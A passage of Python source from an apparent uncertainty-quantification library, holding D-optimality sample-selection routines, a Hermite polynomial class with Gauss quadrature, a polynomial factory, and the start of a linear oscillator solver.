Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_norms**2 + R**2), axis=1) ## shape (n-k, )
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d2, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore', invalid='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d2 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d2 - d4)
return delta
def _greedy_update_D_Optimality_truncate(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- selected submatrix of shape (k,p), A
X1 -- candidate matrix of shape (n-k, p), B
Return:
S value without determinant (eqn. 3.18)
"""
X0 = np.array(X0, copy=False, ndmin=2)
X1 = np.array(X1, copy=False, ndmin=2)
if X0.shape[0] > X0.shape[1]:
raise ValueError('Selected matrix {}, but updating formula only works for underdetermined system'.format(X0.shape))
if X0.shape[1] != X1.shape[1]:
raise ValueError('matrix A, B must have same number of columns')
k,p = X0.shape
n_k, p = X1.shape
# start = time.time()
A = copy.copy(X0[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X1[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X0[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X1[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore', invalid='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d4)
return delta
def _check_complement(self, A, B, U=None):
"""
check if A.union(B) = U and A.intersection(B) = 0
"""
A = set(A)
B = set(B)
U = set(np.arange(self.X.shape[0])) if U is None else set(U)
if A.union(B) != U:
raise ValueError(' Union of sets A and B are not the universe U')
if len(A.intersection(B)) != 0:
raise ValueError(' Sets A and B have common elements: {}'.format(A.intersection(B)))
return True
def _list_union(self, ls1, ls2):
"""
append ls2 to ls1 and check if there exist duplicates
return the union of two lists and remove duplicates
"""
ls_common = self._list_inter(ls1, ls2)
if len(ls_common) != 0:
print('list 1: {} '.format(ls1))
print('list 2: {} '.format(ls2))
raise ValueError('_list_union: Duplicate elements {} found in two lists'.format(ls_common))
ls = list(copy.deepcopy(ls1)) + list(copy.deepcopy(ls2))
return ls
def _list_diff(self, ls1, ls2):
"""
returns a list of elements in ls1 but not in ls2
"""
ls1 = list(copy.deepcopy(ls1))
ls2 = list(copy.deepcopy(ls2))
for element in ls2:
try:
ls1.remove(element)
except ValueError:
pass
return ls1
def _list_inter(self, ls1, ls2):
"""
return common elements between ls1 and ls2
"""
ls = list(set(ls1).intersection(set(ls2)))
return ls
### ------------------- outdated functions -----------------------
def _get_samples_svalue(self,n, candidate_samples, optimal_samples):
"""
return row indices for quasi optimal experimental design based on fast greedy initialization
Arguments:
n -- size of 'new' quasi optimal subset
X -- design matrix with candidates samples of shape (M,p)
M: number of samples, p: number of features
row_selected -- indices, ndarray of shape (N,) corresponding row selection matrix of length n
if row_selected is None, an empty list will be created first and n items will be appended
Otherwise, additional (n-m0) items (row index in design matrix X) will be appended
is_orth_col -- Boolean indicating if the basis space is orthogonal
Returns:
row selection matrix row_selected of shape (n, M)
"""
candidate_samples = copy.deepcopy(candidate_samples)
optimal_samples = copy.deepcopy(optimal_samples)
optimal_samples_ = [] ## new samples to be added in this step
for _ in tqdm(range(n), ascii=True, desc=" - [S-values]",ncols=80):
# for _ in range(n):
## find the next optimal index from Q which is not currently selected
optimal_samples_all= self._list_union(optimal_samples, optimal_samples_)
candidate_samples_ = self._list_diff(candidate_samples, optimal_samples_)
assert self._check_complement(optimal_samples, candidate_samples)
X_cand = self.X[candidate_samples_ ,:]
X_sltd = self.X[optimal_samples_all,:]
## calculate (log)S values for each row in X_cand together with X_sltd
optimality_values = self._cal_svalue(X_cand,X_sltd)
if len(optimality_values) != len(candidate_samples_):
raise ValueError('Expecting {:d} D-Optimality values, but {:d} given'.format(len(candidate_samples_), len(optimality_values)))
i = candidate_samples_[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
## check if this index is already selected
if i in optimal_samples_all:
print('Row {:d} already selected'.format(i))
raise ValueError('Duplicate sample {:d} already exists'.format(i))
optimal_samples_.append(i)
return optimal_samples_
def _remove_rows_from_matrix(self, A, rows):
"""
remove rows from matrix A
Arguments:
A: ndarray of shape(m,n)
rows: row index to be removed, len=k
Return:
matrix of shape(m-k,n)
"""
A = np.array(A, copy=False, ndmin=2)
A = A[list(set(np.arange(A.shape[0])).difference(set(rows))), :]
return A
def _argmax_svalues_greedy(self, optimal_samples, Q):
"""
find the next quasi optimal sample
Arguments:
optimal_samples -- list containing selected row indices from original design matrix Q
Q -- QR factorization of candidate design matrix X if basis is not orthogonal, otherwise is X
Return:
i -- integer, index with maximum svalue
"""
## Find the index candidate set to chose from (remove those in optimal_samples from all (0-M))
## if optimal_samples is empty, choose one randomly
row_candidate = list(set(range(Q.shape[0])).difference(set(optimal_samples)))
## split original design matrix Q into candidate matrix Q_cand, and selected Q_sltd
Q_cand = Q[np.array(row_candidate, dtype=np.int32),:]
Q_sltd = Q[np.array(optimal_samples , dtype=np.int32),:]
## calculate (log)S values for each row in Q_cand together with Q_sltd
optimality_values = self._cal_svalue(Q_cand,Q_sltd)
if len(optimality_values) != len(row_candidate):
raise ValueError('Expecting {:d} S values, but {:d} given'.format(len(row_candidate), len(optimality_values)))
i = row_candidate[np.argmax(optimality_values)] ## return the indices with largest s-value in original matrix Q
return i
def adaptive(self,X,n_samples, selected_col=[]):
"""
Coherence Compressinve D optimality
Xb = Y
X: Design matrix X(u) of shape(num_samples, num_features)
S: selected columns
K: sparsity
Return:
Experiment samples of shape(ndim, n_samples)
"""
selected_col = selected_col if selected_col else range(X.shape[1])
if self.selected_rows is None:
X_selected = X[:,selected_col]
selected_rows = self.samples(X_selected, n_samples=n_samples)
self.selected_rows = selected_rows
return selected_rows
else:
X_selected = X[self.selected_rows,:][:,selected_col]
X_candidate= X[:, selected_col]
### X_selected.T * B = X_candidate.T -> solve for B
X_curr_inv = np.dot(np.linalg.inv(np.dot(X_selected, X_selected.T)), X_selected)
B = np.dot(X_curr_inv, X_candidate.T)
X_residual = X_candidate.T - np.dot(X_selected.T, B)
Q, R, P = sp.linalg.qr(X_residual, pivoting=True)
selected_rows = np.concatenate((self.selected_rows, P))
_, i = np.unique(selected_rows, return_index=True)
selected_rows = selected_rows[np.sort(i)]
selected_rows = selected_rows[:len(self.selected_rows) + n_samples]
self.selected_rows = selected_rows
return selected_rows[len(self.selected_rows):]
def _cal_svalue_under(self, X0, X1):
"""
Calculate the S-value (without determinant) of a candidate vector w.r.t selected subsets
when the current selection k < p (eqn. 3.18)
Arguments:
X0 -- candidate matrix of shape (n-k, p),
X1 -- selected submatrix of shape (k,p)
Return:
S value without determinant (eqn. 3.18)
"""
n_k, p = X0.shape
k,p = X1.shape
# start = time.time()
A = copy.copy(X1[0:k, 0:k]) ## shape (k, k)
try:
AAinv = np.linalg.inv(A.T.dot(A)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(A.T.dot(A))
print('singular value of A.T *A: {}'.format(s))
R = copy.copy(X0[:, 0:k]) ## shape (n-k, k)
B = AAinv.dot(R.T) ## shape (k, n-k)
c = copy.copy(X1[0:k, k]).reshape((k,1)) ## shape(k, 1) column vector
g = AAinv.dot(A.T).dot(c) ## shape (k, 1)
gamma = X0[:,k] ## shape (n-k,)
### calculating alpha with broadcasting
### eqn: 3.14-> alpha = Alpha1 * Alpha2 * Alph3
### Alpha1 = c.T A + gamma * r.T
### Alpha2 = I - b * r.T / (1 + r.T * b)
### Alpha3 = g + gamma * b
Alpha1 = R.T * gamma ## R[:,i] * gamma[i] , shape (k, n-k)
Alpha1 = c.T.dot(A) + Alpha1.T ## shape (n-k, k), add c.T.dot(A) to each row of Alpha1.T
Alpha3 = g + B * gamma ## shape (k, n-k)
size_of_array_8gb = 1e8
multiprocessing_threshold= 100
## size of largest array is of shape (n-k, k, k)
if n_k * k * k < size_of_array_8gb:
d1 = 1.0 + (R * B.T).sum(-1) ### shape (n-k, )
Alpha2 = B.T[:,:,np.newaxis] * R[:,np.newaxis] ### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
# Alpha = [ia.dot(ib).dot(ic).item() for ia, ib, ic in zip(Alpha1[:,np.newaxis], Alpha2, Alpha3.T[:,:,np.newaxis])]
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[:,np.newaxis], Alpha2, optimize='greedy')
Alpha = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[:,:,np.newaxis], optimize='greedy')
else:
batch_size = math.floor(size_of_array_8gb/k/k) ## large memory is allocated as 8 GB
Alpha = []
# for i in tqdm(range(math.ceil(n_k/batch_size)), ascii=True, desc=' Batch (n={:d}): -'.format(batch_size),ncols=80):
for i in range(math.ceil(n_k/batch_size)):
idx_start = i*batch_size
idx_end = min((i+1) * batch_size, n_k)
R_ = R[idx_start:idx_end, :]
B_ = B[:, idx_start:idx_end]
# time0 = time.time()
d1 = 1.0 + (R_ * B_.T).sum(-1) ### shape (n-k, )
Alpha2 = B_.T[:,:,np.newaxis] * R_[:,np.newaxis]### shape (n-k, k ,k)
Alpha2 = np.moveaxis(Alpha2,0,-1) ### shape (k, k, n-k)
Alpha2 = Alpha2/d1
Alpha2 = np.moveaxis(Alpha2,-1, 0) ### shape (n-k, k ,k)
I = np.identity(Alpha2.shape[-1])
Alpha2 = I - Alpha2 ### shape (n-k, k, k)
Alpha_ = np.einsum('ijk,ikl->ijl', Alpha1[idx_start:idx_end,np.newaxis], Alpha2, optimize='greedy')
Alpha_ = np.einsum('ijl,ilj->i', Alpha_, Alpha3.T[idx_start:idx_end,:,np.newaxis], optimize='greedy')
Alpha.extend(Alpha_)
Alpha = np.array(Alpha)
if Alpha.shape != (n_k,):
print(Alpha)
raise ValueError('Expecting Alpha shape to be ({},), but {} given'.format(n_k, Alpha.shape))
d1 = np.log(1.0 + (R * B.T).sum(-1)) ## shape (n-k, )
A_norms = np.linalg.norm(A, axis=0)
d2 = np.sum(np.log(A_norms**2 + R**2), axis=1) ## shape (n-k, )
d4 = np.squeeze(c.T.dot(c) + gamma**2) ## shape(n-k, )
d3 = d4 - Alpha
d4 = np.log(d4)
if np.any(d3 > 0):
## d1, d2, d4 > 0. If there exist at least one d3 > 0, set negative d3 to -inf
with np.errstate(divide='ignore'):
d3 = np.log(d3)
d3 = np.nan_to_num(d3, nan=-np.inf)
delta = d1 + d3 - d2 - d4
else:
## all d3 < 0. then take the negative of all d3 and return the smallest s value
d3 = np.log(abs(d3))
delta = -(d1 + d3 - d2 - d4)
return delta
def _cal_svalue_over(self, X0, X1):
"""
Calculate the log(S) value (without determinant) of candidate vectors w.r.t selected subsets
when the current selection k >= p (eqn. 3.16) for each pair of (X[i,:], X1)
Arguments:
X0 -- candidate matrix of shape (n-k, p),
X1 -- selected subsets matrix of shape (k,p)
Return:
S value without determinant (eqn. 3.16)
"""
try:
AAinv = np.linalg.inv(X1.T.dot(X1)) ## shape (k, k)
except np.linalg.LinAlgError:
u,s,v = np.linalg.svd(X1.T.dot(X1))
print('singular value of A.T *A: {}'.format(s))
X1_norms = np.linalg.norm(X1, axis=0) ## (p,)
d1 = np.log(1.0 + (X0.dot(AAinv) * X0).sum(-1)) ## (n-k,)
d2 = np.sum(np.log(X1_norms**2 + X0**2), axis=1) ## (n-k,)
optimality_values = d1 - d2
return np.squeeze(optimality_values)
# def _cal_svalue_over(self, X0, X1):
# """
# Calculate the S value (without determinant) of candidate vectors w.r.t selected subsets
# when the current selection k >= p (eqn. 3.16) for each pair of (X[i,:], X1)
# Arguments:
# X0 -- candidate matrix of shape (number of candidates, p),
# X1 -- selected subsets matrix of shape (k,p)
# Return:
# log S value without determinant (eqn. 3.16)
# """
# XXinv = np.linalg.inv(np.dot(X1.T,X1))
# start = time.time()
# A_l2 = np.linalg.norm(X1, axis=0).reshape(1,-1) ## l2 norm for each column in X1, row vector
# svalues_log = []
# for r in X0:
# r = r.reshape(1,-1) ## row vector
# with np.errstate(invalid='ignore'):
# d1 = np.log(1 + np.dot(r, np.dot(XXinv, r.T)))
# d2 = np.log(np.prod(A_l2**2 + r**2))
# svalues_log.append(d1 - d2)
# end = time.time()
# print('for loop time elapse : {}'.format(end-start))
# # print(np.around(np.exp(svalues_log), 2))
# start = time.time()
# X1_norms = np.linalg.norm(X1, axis=0)
# # d1 = 1.0 + np.diagonal(X0.dot(XXinv).dot(X0.T))
# d1 = 1.0 + (X0.dot(XXinv) * X0).sum(-1)
# d2 = np.prod(X1_norms**2 + X0**2, axis=1)
# delta = d1/d2
# end = time.time()
# # print(np.around(delta, 2))
# print('matrix time elapse : {}'.format(end-start))
# return svalues_log
# def _cal_svalue_under(self, X0, X1):
# """
# Calculate the log S-value (without determinant) of a candidate vector w.r.t selected subsets
# when the current selection k < p (eqn. 3.18)
# Arguments:
# X0 -- candidate matrix of shape (number of candidates, p),
# X1 -- selected subsets matrix of shape (k,p)
# Return:
# log S value without determinant (eqn. 3.18)
# """
# k,p = X1.shape
# assert k < p
# X1 = copy.copy(X1[:,0:k])
# X0 = copy.copy(X0[:,0:k+1])
# svalues_log = []
# XXinv = np.linalg.inv(np.dot(X1.T,X1))
# A_l2 = np.linalg.norm(X1, axis=0).reshape(1,-1)
# for r in X0:
# c = r[0:k].reshape((k,1)) ## column vector
# gamma = r[k]
# r = copy.copy(c)
# b = np.dot(XXinv,r)
# g = np.dot(XXinv,np.dot(X1.T,c))
# a1 = np.dot(c.T,X1) + gamma * r.T
# a2 = np.identity(k) - np.dot(b,r.T)/(1 + np.dot(r.T,b))
# a3 = g + gamma *b
# a = np.squeeze(np.dot(a1,np.dot(a2,a3)))
# with np.errstate(invalid='ignore'):
# d1 = np.log(np.squeeze(1 + np.dot(r.T, b)))
# d2 = np.sum(np.log(A_l2**2 + r.T**2))
# d3 = np.log(np.squeeze(np.dot(c.T,c) + gamma**2 - a))
# d4 = np.log(np.squeeze(np.dot(c.T,c) + gamma**2))
# svalues_log.append(d1 + d3 - d2 - d4)
# return svalues_log
```
#### File: uqra/polynomial/hermite.py
```python
import numpy as np
import itertools, math
from ._polybase import PolyBase
from . import polyutils as pu
import scipy.stats as stats
class Hermite(PolyBase):
"""
Probabilists Hermite polynomial
Orthoganality:
probabilists: \int Hm(x) Hn(x) exp(-x^2/2) dx = sqrt(2pi) n! 1{mn}
physicists : \int Hm(x) Hn(x) exp(-x^2 ) dx = sqrt(pi) 2**n n! 1{mn}
"""
def __init__(self, d=None, deg=None, coef=None, domain=None, window=None, multi_index='total', hem_type='probabilists'):
self.multi_index = multi_index
self.ndim = pu.check_int(d)
self.deg = pu.check_int(deg)
self.hem_type = hem_type.lower()
self.name = 'Hermite_e' if hem_type.startswith('prob') else 'Hermite'
self.nickname = 'Heme' if hem_type.startswith('prob') else 'Hem'
self.dist_name = 'norm'
self.weight = self._wiener_askey_distribution()
self.set_coef(coef)
self._update_basis()
def gauss_quadrature(self, n, loc=[], scale=[]):
"""
Gauss-HermiteE quadrature.
Computes the sample points and weights for Gauss-HermiteE quadrature.
These sample points and weights will correctly integrate polynomials of degree 2*deg - 1 or less over the interval [-\inf, \inf] with the weight function f(x) = \exp(-x^2/2) for probabilists and weight function f(x) = \exp(-x^2) for physicists
Parameters:
deg : int
Number of sample points and weights. It must be >= 1.
Returns:
x : ndarray
1-D ndarray containing the sample points.
y : ndarray
1-D ndarray containing the weights.
"""
self.n_gauss = pu.check_int(n)
## for unspecified distribution parameters, default (loc, scale) = (0,1)
for _ in range(len(loc), self.ndim):
loc.append(0)
scale.append(1)
coords = []
weight = []
if self.hem_type.startswith('prob'):
for iloc, iscale in zip(loc, scale):
x, w = np.polynomial.hermite_e.hermegauss(self.n_gauss)
x = iloc + iscale* x
w = iscale * w
coords.append(x)
weight.append(w)
elif self.hem_type.startswith('phy'):
for iloc, iscale in zip(loc, scale):
x, w = np.polynomial.hermite.hermgauss(self.n_gauss)
x = iloc + iscale* x
w = iscale * w
coords.append(x)
weight.append(w)
else:
raise ValueError('hem_type is either probabilists or physicists')
x = np.array(list(itertools.product(*coords))).T
x = x.reshape(self.ndim, -1)
w = np.prod(np.array(list(itertools.product(*weight))).T, axis=0)
w = np.squeeze(w)
return x, w
def vandermonde(self, x, normalize=True):
"""
Pseudo-Vandermonde matrix of given degree.
Arguments:
x: ndarray of shape(ndim, nsamples)
normalize: boolean
return:
vandermonde matrix of shape(nsampels, deg)
"""
x = np.array(x, copy=0, ndmin=2) + 0.0
d, n = x.shape
assert (d == self.ndim), 'Expected input dimension {:d}, but {:d} given '.format(self.ndim, d)
if self.hem_type == 'probabilists':
vander_1d = np.array([np.polynomial.hermite_e.hermevander(ix, self.deg) for ix in x])
elif self.hem_type == 'physicists':
vander_1d = np.array([np.polynomial.hermite.hermvander(ix, self.deg) for ix in x])
else:
raise ValueError('hem_type is either probabilists or physicists')
vander = np.ones((n, self.num_basis))
## basis_degree, list of tuples containing degree component for each basis function. i.e. (3,0,2) -> x1**3 + x2**0 + x3**2
if self.basis_degree is None:
self._update_basis()
for i, ibasis_degree in enumerate(self.basis_degree):
### ibasis_degree = (l,m,n,k), assume ndim=4
for idim, ideg in enumerate(ibasis_degree):
### (0,l), (1,m), (2,n), (3,k)
vander[:,i] = vander[:,i] * vander_1d[idim,:,ideg]
if normalize:
vander = vander / np.sqrt(self.basis_norms)
return vander
def set_ndim(self, ndim):
"""
set the dimension of polynomial
"""
self.ndim = pu.check_int(ndim)
self._update_basis()
def set_degree(self, deg):
"""
set polynomial degree order
"""
self.deg = pu.check_int(deg)
self._update_basis()
def set_coef(self, coef):
"""
set polynomial coef
Arguments: None, or scalar, array-like
if coef is scalar, all polynomial coefficient will be assigned as that same value
"""
self._update_basis()
if coef is None:
coef = None
elif np.ndim(coef) == 0:
coef = np.ones(self.num_basis) * coef + 0.0
else:
if len(coef) != self.num_basis:
raise TypeError('Expected coefficients has length {}, but {} is given'.format(self.num_basis, len(coef)))
self.coef = coef
def _wiener_askey_distribution(self):
"""
Return Askey-Wiener distributions
"""
if self.ndim is None:
weight = None
elif self.hem_type.lower().startswith('prob'):
weight = stats.norm(0,1)
elif self.hem_type.lower().startswith('phy'):
weight = stats.norm(0,np.sqrt(0.5))
else:
raise ValueError('UQRA.Hermite: {} not defined for hem_type '.format(hem_type))
return weight
def _update_basis(self):
"""
Return a list of polynomial basis function with specified degree and multi_index rule
"""
### get self.basis_degree and self.num_basis
### - basis_degree, list of tuples containing degree component for each basis function. i.e. (3,0,2) -> x1**3 + x2**0 + x3**2
super()._update_basis()
if self.basis_degree is None:
self.basis = None
self.basis_norms = None
else:
if self.hem_type == 'probabilists':
norms_1d = np.array([math.factorial(i) for i in range(self.deg+1)])
basis = []
basis_norms = []
## calculate the ith multidimensional polynomial element of order(l,m,n)
for ibasis_degree in self.basis_degree:
ibasis = 1.0
inorms = 1.0
## polynomial element (l,m,n)
for ideg in ibasis_degree:
ibasis = ibasis * np.polynomial.hermite_e.HermiteE.basis(ideg)
inorms = inorms * norms_1d[ideg]
basis.append(ibasis)
basis_norms.append(inorms)
self.basis = basis
self.basis_norms = np.array(basis_norms)
elif self.hem_type == 'physicists':
norms_1d = np.array([math.factorial(i) * 2**i for i in range(self.deg+1)])
basis = []
basis_norms = []
for ibasis_degree in self.basis_degree:
ibasis = 1.0
inorms = 1.0
for ideg in ibasis_degree:
ibasis = ibasis * np.polynomial.hermite.Hermite.basis(ideg)
inorms = inorms * norms_1d[ideg]
basis.append(ibasis)
basis_norms.append(inorms)
self.basis = basis
self.basis_norms = np.array(basis_norms)
else:
raise ValueError('hem_type is either probabilists or physicists')
return self.basis, self.basis_norms
def __call__(self, x):
"""
Evaluate polynomials at given values x
Arguments:
x, ndarray of shape (ndim, nsamples)
"""
self._update_basis()
x = np.array(x, copy=False, ndmin=2)
d, n = x.shape ## (ndim, samples)
if d != self.ndim:
raise TypeError('Expected x has dimension {}, but {} is given'.format(self.ndim, d))
if self.coef is None:
self.coef = np.ones((self.num_basis,))
size_of_array_4gb = 1e8/2.0
## size of largest array is of shape (n-k, k, k)
if x.shape[1] * self.num_basis < size_of_array_4gb:
vander = self.vandermonde(x)
y = np.sum(vander * self.coef, -1)
else:
batch_size = math.floor(size_of_array_4gb/self.num_basis) ## large memory is allocated as 8 GB
y = []
for i in range(math.ceil(x.shape[1]/batch_size)):
idx_beg = i*batch_size
idx_end = min((i+1) * batch_size, x.shape[1])
x_ = x[:,idx_beg:idx_end]
# vander_ = self.vandermonde(x_)
vander_ = self.vandermonde(x_)
y += list(np.sum(vander_ * self.coef, -1))
y = np.array(y)
return y
def __str__(self):
self._update_basis()
if self.coef is None:
self.coef = np.ones((self.num_basis,))
return str(sum([ibasis * icoef for ibasis, icoef in zip(self.basis, self.coef)]))
# raise NotImplementedError
```
#### File: uqra/polynomial/poly.py
```python
import numpy as np
import itertools, math
from ._polybase import PolyBase
import scipy.stats as stats
from .hermite import Hermite
from .legendre import Legendre
def orthogonal(ndim, p, poly_name):
poly_name = poly_name.lower()
if poly_name == 'leg':
orth_basis = Legendre(d=ndim,deg=p)
elif poly_name == 'hem':
orth_basis = Hermite(d=ndim,deg=p, hem_type='physicists')
elif poly_name == 'heme':
orth_basis = Hermite(d=ndim,deg=p, hem_type='probabilists')
else:
raise NotImplementedError
return orth_basis
```
#### File: solver/collections/dynamic.py
```python
import uqra
from uqra.solver._solverbase import SolverBase
import os, numpy as np, scipy as sp
# from scipy.integrate import odeint
# from scipy.optimize import brentq
from .PowerSpectrum import PowerSpectrum
from uqra.environment import Kvitebjorn
from tqdm import tqdm
class linear_oscillator(SolverBase):
"""
Solving linear oscillator in frequency domain
m x'' + c x' + k x = f
=> x'' + 2*zeta*omega_n x' + omega_n**2 x = 1/m * f
where, omega_n = sqrt(k/m), zeta = c/(2*sqrt(m*k))
default value: omega_n = 1/pi Hz (2 rad/s), zeta = 0.01
f: frequency in Hz
t: array, A sequence of time points for which to solve for y.
args, tuple, oscillator arguments in order of (mass, damping, stiffness)
kwargs, dictionary, spectrum definitions for the input excitation functions
"""
def __init__(self, **kwargs):
super().__init__()
self.name = 'linaer oscillator'
self.nickname = 'SDOF'
self.spec_name = kwargs.get('spec_name', 'JONSWAP')
self.ndim_spec = PowerSpectrum(self.spec_name).ndim
self.ndim = self.ndim_spec + int(0) ## need to change when cmk are also random
self.out_responses= kwargs.get('out_responses', 'ALL')
self.out_stats = kwargs.get('out_stats', ['mean', 'std', 'skewness', 'kurtosis', 'absmax', 'absmin', 'up_crossing'])
self.axis = kwargs.get('axis', 0)
self.tmax = kwargs.get('time_max', 1000)
self.dt = kwargs.get('dt', 0.1)
self.distributions= kwargs.get('environment', Kvitebjorn)
self.dist_name = self.distributions.__name__.split('.')[-1]
self.n_short_term= kwargs.get('n_short_term', 10) ## number of short term simulations
# self.theta_m = []
# self.theta_s = []
### two ways defining mck
if 'k' in kwargs.keys() and 'c' in kwargs.keys():
self.m = kwargs.get('m', 1)
self.k = kwargs['k']
self.c = kwargs['c']
self.zeta = self.c/(2*np.sqrt(self.m*self.k))
self.omega_n= 2*np.pi*np.sqrt(self.k/self.m) # rad/s
else:
self.zeta = kwargs.get('zeta', 0.01)
self.omega_n= kwargs.get('omega_n', 2) # rad/s
self.m = kwargs.get('m', 1)
self.k = (self.omega_n/2/np.pi) **2 * self.m
self.c = self.zeta * 2 * np.sqrt(self.m * self.k)
self.mck = (self.m, self.c, self.k)
def __str__(self):
message = 'Single Degree of Fredom Oscillator: \n' + \
' - {:<15s} : {}\n'.format('mck' , np.around(self.mck, 2)) + \
' - {:<15s} : {}\n'.format('zeta' , np.around(self.zeta, 2)) + \
' - {:<15s} : {}\n'.format('omega_n' , np.around(self.omega_n, 2)) + \
' - {:<15s} : {}\n'.format('spec_name', self.spec_name) + \
' - {:<15s} : {}\n'.format('out_responses', self.out_responses) + \
' - {:<15s} : {}\n'.format('time_max' , self.tmax) + \
' - {:<15s} : {}\n'.format('dt' , self.dt)
return message
def run(self, x, return_all=False, random_seed=None, **kwargs):
"""
run linear_oscillator:
Arguments:
x, power spectrum parameters, ndarray of shape (n_parameters, nsamples)
"""
np.random.seed(random_seed)
n_short_term = kwargs.get('n_short_term', self.n_short_term)
out_responses = kwargs.get('out_responses', self.out_responses)
x = np.array(x.T, copy=False, ndmin=2)
# x = x.reshape(-1,1) if x.ndim_spec == 1 else x
## if x is just one set of input of shape (2, 1)
y_QoI = []
seeds = np.random.randint(0, int(2**32-1), size=n_short_term)
for ishort_term in range(n_short_term):
# Note that xlist and ylist will be tuples (since zip will be unpacked). If you want them to be lists, you can for instance use:
pbar_x = tqdm(x, ascii=True, desc=" - {:d}/{:d} ".format(ishort_term, self.n_short_term))
y_raw_, y_QoI_ = map(list, zip(*[self._linear_oscillator(ix, seed=seeds[ishort_term], out_responses=out_responses) for ix in pbar_x]))
y_QoI.append(y_QoI_)
if return_all:
np.save('{:s}_raw{:d}'.format(self.nickname,ishort_term), np.array(y_raw_))
return np.array(y_QoI)
def x_psd(self, f, x, **kwargs):
"""
Return the power spectral density (PSD) estimate, pxx, at frequency,f, for the given PowerSpectrum with given parameters x
Returns:
PowerSpectrum object of input signal
"""
